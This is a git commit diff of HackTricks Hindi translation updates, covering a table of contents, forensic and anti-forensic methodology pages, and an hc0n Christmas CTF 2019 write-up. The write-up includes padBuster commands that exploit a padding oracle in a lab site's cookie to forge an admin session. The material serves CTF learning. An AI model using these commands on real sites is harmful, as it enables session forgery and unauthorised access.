Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u

This commit is contained in:
Translator 2024-02-07 05:45:20 +00:00
parent 6741524916
commit d5268706a9
105 changed files with 3558 additions and 3842 deletions

View file

@ -5,8 +5,6 @@
* [HackTricks](README.md) * [HackTricks](README.md)
* [HackTricks Values & faq](welcome/hacktricks-values-and-faq.md) * [HackTricks Values & faq](welcome/hacktricks-values-and-faq.md)
* [About the author](welcome/about-the-author.md) * [About the author](welcome/about-the-author.md)
* [Getting Started in Hacking](welcome/getting-started-in-hacking.md)
## 🤩 Generic Methodologies & Resources ## 🤩 Generic Methodologies & Resources
* [Pentesting Methodology](generic-methodologies-and-resources/pentesting-methodology.md) * [Pentesting Methodology](generic-methodologies-and-resources/pentesting-methodology.md)
@ -40,9 +38,7 @@
* [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md) * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md)
* [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
* [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md) * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md)
* [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
* [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
* [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
* [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md) * [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md)
* [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md) * [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
* [Suricata & Iptables cheatsheet](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md) * [Suricata & Iptables cheatsheet](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md)
@ -60,7 +56,6 @@
* [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md) * [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
* [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md) * [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
* [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md) * [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md)
* [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md) * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md) * [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md)
* [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md) * [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md)

File diff suppressed because one or more lines are too long

View file

@ -1,41 +1,45 @@
# hc0n क्रिसमस CTF - 2019 # hc0n Christmas CTF - 2019
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg) ![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
## जाँच ## Enumeration
मैंने अपने उपकरण [**Legion**](https://github.com/carlospolop/legion) का उपयोग करके मशीन की **जाँच शुरू की**: मैंने **मेरे टूल Legion का उपयोग करके मशीन का जाँच करना शुरू किया**:
![](<../../.gitbook/assets/image (244).png>) ![](<../../.gitbook/assets/image (244).png>)
2 पोर्ट खुले हैं: 80 (**HTTP**) और 22 (**SSH**) 2 खुले पोर्ट हैं: 80 (**HTTP**) और 22 (**SSH**)
वेब पेज में आप **नए उपयोगकर्ता पंजीकृत कर सकते हैं**, और मुझे ध्यान आया कि **कुकी की लंबाई उपयोगकर्ता के नाम की लंबाई पर निर्भर करती है**: वेब पेज में आप **नए उपयोगकर्ता रजिस्टर** कर सकते हैं, और मुझे पता चला कि **कुकी की लंबाई उपयोगकर्ता के नाम की लंबाई पर निर्भर है**:
![](<../../.gitbook/assets/image (245).png>) ![](<../../.gitbook/assets/image (245).png>)
![](<../../.gitbook/assets/image (246).png>) ![](<../../.gitbook/assets/image (246).png>)
और यदि आप **कुकी** के कुछ **बाइट** को बदलते हैं तो आपको यह त्रुटि मिलती है: और अगर आप **कुकी** के कुछ **बाइट** को बदलते हैं तो आपको यह त्रुटि मिलती है:
![](<../../.gitbook/assets/image (247).png>) ![](<../../.gitbook/assets/image (247).png>)
इस जानकारी के साथ और [**पैडिंग ऑरेकल दुर्बलता को पढ़ने**](../../cryptography/padding-oracle-priv.md) के साथ मैंने इसे उत्पन्न किया: इस जानकारी के साथ और [**पैडिंग ऑरेकल वल्नरेबिलिटी को पढ़ने**](../../cryptography/padding-oracle-priv.md) के साथ मैंने इसे एक्सप्लॉइट करने में सक्षम था:
```bash ```bash
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
``` ```
![](<../../.gitbook/assets/image (248).png>)
![](<../../.gitbook/assets/image (249) (1).png>)
**उपयोगकर्ता व्यवस्थापक को सेट करें:** **उपयोगकर्ता व्यवस्थापक को सेट करें:**
```bash ```bash
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin" perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
@ -46,10 +50,10 @@ perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* प्राप्त करें [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>

View file

@ -4,15 +4,15 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर **मेरा अनुसरण करें** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स को साझा करें** [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके। * **हैकिंग ट्रिक्स साझा करें** द्वारा [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।
</details> </details>
## एक छवि बनाना और माउंट करना ## छवि बनाना और माउंट करना
{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %} {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %}
[image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md) [image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md)
@ -20,7 +20,7 @@
## मैलवेयर विश्लेषण ## मैलवेयर विश्लेषण
यह **छवि के पास होने के बाद करने के लिए आवश्यक नहीं है**। लेकिन आप इस मैलवेयर विश्लेषण तकनीक का अलग-थलग उपयोग कर सकते हैं अगर आपके पास एक फ़ाइल, फ़ाइल-सिस्टम छवि, मेमोरी छवि, पीकैप... है, तो यह अच्छा होगा कि **इन कार्रवाइयों को ध्यान में रखें**: यह **आवश्यक नहीं है कि आप छवि के पास होने के बाद पहला कदम करें**। लेकिन आप एक फ़ाइल, फ़ाइल-सिस्टम छवि, मेमोरी छवि, pcap... के साथ इस मैलवेयर विश्लेषण तकनीकों का अलग से उपयोग कर सकते हैं, इसलिए यह **कार्रवाई को ध्यान में रखना अच्छा है**:
{% content-ref url="malware-analysis.md" %} {% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md) [malware-analysis.md](malware-analysis.md)
@ -28,13 +28,13 @@
## छवि की जांच ## छवि की जांच
यदि आपको एक उपकरण की **फोरेंसिक छवि** दी जाती है, तो आप **विभाजनों, फ़ाइल-सिस्टम** का उपयोग करके शुरू कर सकते हैं और पोटेंशियली **दिलचस्प फ़ाइलें** (हटाई गई भी) को **पुनर्प्राप्त कर सकते हैं**। इसे सीखें: यदि आपको एक उपकरण की **फोरेंसिक छवि** दी गई है तो आप **विभाजनों, फ़ाइल-सिस्टम** और **रिकवरींग** का आरंभ कर सकते हैं, संभावित रूप से **रोचक फ़ाइलें** (हाल ही में हटाई गई भी)। इसे कैसे करें जानने के लिए:
{% content-ref url="partitions-file-systems-carving/" %} {% content-ref url="partitions-file-systems-carving/" %}
[partitions-file-systems-carving](partitions-file-systems-carving/) [partitions-file-systems-carving](partitions-file-systems-carving/)
{% endcontent-ref %} {% endcontent-ref %}
उपयोग किए जाने वाले ओएस और प्लेटफ़ॉर्म के आधार पर विभिन्न दिलचस्प आर्टिफैक्ट्स खोजने चाहिए: उपयोग किए गए ओएस और प्लेटफ़ॉर्म के आधार पर विभिन्न रोचक आर्टिफैक्ट्स खोजने चाहिए:
{% content-ref url="windows-forensics/" %} {% content-ref url="windows-forensics/" %}
[windows-forensics](windows-forensics/) [windows-forensics](windows-forensics/)
@ -48,16 +48,16 @@
[docker-forensics.md](docker-forensics.md) [docker-forensics.md](docker-forensics.md)
{% endcontent-ref %} {% endcontent-ref %}
## विशेष फ़ाइल-प्रकार और सॉफ़्टवेयर की गह जांच ## विशेष फ़ाइल-प्रकार और सॉफ़्टवेयर की गहरी जांच
यदि आपके पास बहुत **संदिग्ध फ़ाइल** है, तो **फ़ाइल-प्रकार और सॉफ़्टवेयर** पर निर्भर करता है कि कौन से **ट्रिक्स** उपयोगी हो सकते हैं।\ यदि आपके पास बहुत **संदिग्ध फ़ाइल** है, तो **फ़ाइल-प्रकार और सॉफ़्टवेयर** पर निर्भर करता है कि कौन से **ट्रिक्स** उपयोगी हो सकते हैं।\
कुछ दिलचस्प ट्रिक्स सीखने के लिए निम्नलिखित पृष्ठ को पढ़ें: कुछ रोचक ट्रिक्स सीखने के लिए निम्नलिखित पृष्ठ पढ़ें:
{% content-ref url="specific-software-file-type-tricks/" %} {% content-ref url="specific-software-file-type-tricks/" %}
[specific-software-file-type-tricks](specific-software-file-type-tricks/) [specific-software-file-type-tricks](specific-software-file-type-tricks/)
{% endcontent-ref %} {% endcontent-ref %}
मैं एक विशेष उल्लेख करना चाहता हूँ पृष्ठ का: मैं विशेष रूप से इस पृष्ठ का उल्लेख करना चाहता हूँ:
{% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %} {% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %}
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md) [browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
@ -77,7 +77,7 @@
## **एंटी-फोरेंसिक तकनीकें** ## **एंटी-फोरेंसिक तकनीकें**
एंटी-फोरेंसिक तकनीकों का उपयोग करने की संभावना को ध्यान में रखें: एंटी-फोरेंसिक तकनीकों का संभावित उपयोग ध्यान में रखें:
{% content-ref url="anti-forensic-techniques.md" %} {% content-ref url="anti-forensic-techniques.md" %}
[anti-forensic-techniques.md](anti-forensic-techniques.md) [anti-forensic-techniques.md](anti-forensic-techniques.md)
@ -87,4 +87,16 @@
{% content-ref url="file-integrity-monitoring.md" %} {% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md) [file-integrity-monitoring.md](file-integrity-monitoring.md)
{% end {% endcontent-ref %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।
</details>

View file

@ -1,35 +1,34 @@
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें! * यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos। * **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos।
</details> </details>
# टाइमस्टैम्प # समय-चिह्न
एक हमलावता **फ़ाइलों के टाइमस्टैम्प को बदलने** में रुचि रख सकता है।\ किसी हमलावर को **फ़ाइलों के समय-चिह्नों को बदलने** में दिलचस्पी हो सकती है।\
एमएफटी में टाइमस्टैम्प्स को खोजना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं। एमएफटी में समय-चिह्नों को खोजना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं।
दोनों गुणों में 4 टाइमस्टैम्प्स होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)। दोनों गुणों में 4 समय-चिह्न होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **MFT रजिस्ट्री संशोधन** (MACE या MACB)।
**Windows explorer** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं। **Windows एक्सप्लोरर** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं।
## टाइमस्टॉम - एंटी-फोरेंसिक टूल ## टाइमस्टॉम्प - एंटी-फोरेंसिक टूल
यह टूल **`$STANDARD_INFORMATION`** के भीतर टाइमस्टैम्प जानकारी को **संशोधित करता है** **लेकिन** **`$FILE_NAME`** के भीतर की जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है। यह उपकरण **`$STANDARD_INFORMATION`** के भीतर समय-चिह्न जानकारी को **संशोधित** करता है **लेकिन** **`$FILE_NAME`** के भीतर जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है।
## Usnjrnl ## Usnjrnl
**USN Journal** (Update Sequence Number Journal), या Change Journal, Windows NT फ़ाइल सिस्टम (NTFS) की एक विशेषता है जो वॉल्यूम पर किए गए परिवर्तनों का एक रिकॉर्ड बनाए रखता है।\ **USN जर्नल** (अपडेट सीक्वेंस नंबर जर्नल) NTFS (Windows NT फ़ाइल सिस्टम) की एक विशेषता है जो वॉल्यूम परिवर्तनों का पता रखता है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) उपकरण इन परिवर्तनों का परीक्षण करने की अनुमति देता है।
इस रिकॉर्ड के संशोधनों की खोज के लिए उपकरण [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) का उपयोग संभव है।
![](<../../.gitbook/assets/image (449).png>) ![](<../../.gitbook/assets/image (449).png>)
@ -37,15 +36,13 @@ HackTricks का समर्थन करने के अन्य तरी
## $LogFile ## $LogFile
एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तन सुनिश्चित करने के लिए लॉग किए जाते हैं ताकि एक सिस्टम क्रैश के बाद महत्वपूर्ण फ़ाइल सिस्टम संरचनाओं का संगत पुनर्प्राप्ति हो सके। इसे [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging) कहा जाता है।\ एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [व्राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एक NTFS फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है।
लॉग किए गए मेटाडेटा को "डॉलर लॉगफ़ाइल" कहा जाता है, जो एक NTFS फ़ाइल सिस्टम के एक रूट निर्देशिका में पाया जाता है।\
इस फ़ाइल को पार्स करने और परिवर्तन खोजने के लिए [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग संभव है।
![](<../../.gitbook/assets/image (450).png>) ![](<../../.gitbook/assets/image (450).png>)
फिर से, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे** फिर, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे**
